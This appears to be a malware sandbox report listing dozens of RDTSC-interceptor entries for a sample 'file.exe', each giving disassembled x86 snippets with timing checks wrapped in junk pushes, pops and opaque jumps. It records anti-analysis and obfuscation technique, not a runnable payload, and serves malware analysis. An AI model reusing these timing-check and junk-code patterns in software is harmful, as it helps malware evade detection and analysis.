                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E948DA second address: E948E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E948E0 second address: E948E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3183 second address: EA31A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAB30C06326h 0x00000008 jmp 00007FAB30C0632Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA31A0 second address: EA31A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA31A4 second address: EA31B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA31B2 second address: EA31B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA31B6 second address: EA31BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA31BC second address: EA31C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA32F1 second address: EA3313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06337h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3313 second address: EA3317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3317 second address: EA3323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3323 second address: EA3336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FAB30D3D446h 0x0000000b jno 00007FAB30D3D446h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA346F second address: EA347B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAB30C06326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA67DB second address: EA67FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA67FD second address: EA6801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6801 second address: EA6805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6805 second address: EA680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA680B second address: EA6836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FAB30D3D456h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FAB30D3D446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA696B second address: EA69A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 ja 00007FAB30C0633Ah 0x0000000f jmp 00007FAB30C06334h 0x00000014 jmp 00007FAB30C0632Bh 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007FAB30C06328h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA69A8 second address: EA6A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FAB30D3D446h 0x00000009 jmp 00007FAB30D3D453h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop eax 0x00000012 jmp 00007FAB30D3D458h 0x00000017 lea ebx, dword ptr [ebp+1245C6C1h] 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FAB30D3D450h 0x00000023 push eax 0x00000024 jo 00007FAB30D3D44Eh 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6A73 second address: EA6AC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jns 00007FAB30C06329h 0x0000000f push 00000000h 0x00000011 sbb si, 1AECh 0x00000016 push 6017A190h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FAB30C06338h 0x00000023 jmp 00007FAB30C06336h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6AC3 second address: EA6ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6C35 second address: EA6C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6C3A second address: EA6C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAB30D3D446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D17F1h], edi 0x00000016 mov dword ptr [ebp+122D2E2Fh], esi 0x0000001c push 00000000h 0x0000001e call 00007FAB30D3D44Ch 0x00000023 xor dword ptr [ebp+122D30EBh], edx 0x00000029 pop esi 0x0000002a call 00007FAB30D3D449h 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 jo 00007FAB30D3D446h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6C7D second address: EA6CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06335h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FAB30C06336h 0x00000011 pushad 0x00000012 jmp 00007FAB30C06335h 0x00000017 jp 00007FAB30C06326h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8D1E second address: EB8D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE8B second address: E9CE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE95 second address: E9CE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE9A second address: E9CEAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A27 second address: EC5A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A31 second address: EC5A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A39 second address: EC5A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A3F second address: EC5A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A46 second address: EC5A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A4D second address: EC5A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC623F second address: EC6253 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAB30D3D446h 0x00000008 jng 00007FAB30D3D446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6546 second address: EC654A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC654A second address: EC6573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAB30D3D450h 0x00000013 jmp 00007FAB30D3D44Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC681C second address: EC683D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06335h 0x00000009 je 00007FAB30C0632Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B46 second address: EC6B71 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAB30D3D452h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FAB30D3D452h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B71 second address: EC6B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAB30C06326h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6CD4 second address: EC6CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FAB30D3D446h 0x0000000e jc 00007FAB30D3D446h 0x00000014 jmp 00007FAB30D3D44Fh 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A797 second address: E8A7A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6E3B second address: EC6E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FAB30D3D44Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6E4A second address: EC6E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06332h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6E65 second address: EC6E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC7532 second address: EC7551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FAB30C06330h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC76B2 second address: EC76B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC76B6 second address: EC7719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06330h 0x00000007 jmp 00007FAB30C06333h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FAB30C06331h 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FAB30C06337h 0x0000001c pushad 0x0000001d jmp 00007FAB30C0632Dh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC786A second address: EC7870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECD474 second address: ECD47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDB16 second address: ECDB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAB30D3D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDB20 second address: ECDB3B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FAB30C0632Ch 0x00000015 jns 00007FAB30C06326h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECEC20 second address: ECEC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C2BD second address: E8C2C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAB30C06326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1B36 second address: ED1B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1B3A second address: ED1B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1B48 second address: ED1B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED223B second address: ED2243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2243 second address: ED2253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D44Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DD0 second address: ED3DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FAB30C06328h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DE3 second address: ED3DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DE9 second address: ED3DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DED second address: ED3E32 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FAB30D3D458h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAB30D3D458h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E32 second address: ED3E87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov di, dx 0x0000000f call 00007FAB30C06329h 0x00000014 js 00007FAB30C0632Eh 0x0000001a jl 00007FAB30C06328h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FAB30C0632Dh 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c jmp 00007FAB30C0632Ch 0x00000031 mov eax, dword ptr [eax] 0x00000033 push esi 0x00000034 push edi 0x00000035 pushad 0x00000036 popad 0x00000037 pop edi 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E87 second address: ED3E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E8B second address: ED3E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FAB30C06326h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3FF7 second address: ED4029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30D3D44Dh 0x00000008 jmp 00007FAB30D3D454h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FAB30D3D448h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4368 second address: ED436C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4AE7 second address: ED4AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4AEB second address: ED4B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7A32 second address: ED7A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7AF4 second address: ED7B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FAB30C0632Bh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAB30C06331h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7B1D second address: ED7B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA56A second address: EDA57C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FAB30C06338h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA2D6 second address: EDA2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAB30D3D44Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA57C second address: EDA580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDDCB1 second address: EDDCB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE06DE second address: EE06E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE06E2 second address: EE06F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE06F8 second address: EE0703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0703 second address: EE0716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAB30D3D446h 0x0000000a popad 0x0000000b jp 00007FAB30D3D44Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0879 second address: EE0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE357B second address: EE357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE357F second address: EE3583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45A1 second address: EE45CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 jl 00007FAB30D3D44Ch 0x0000000e mov dword ptr [ebp+122D18BDh], esi 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D297Eh], eax 0x0000001c push 00000000h 0x0000001e add edi, 065835DBh 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 jl 00007FAB30D3D44Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3762 second address: EE3768 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45CF second address: EE45D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45D7 second address: EE45DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45DB second address: EE45DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE480D second address: EE4827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAB30C0632Bh 0x00000014 rdtsc
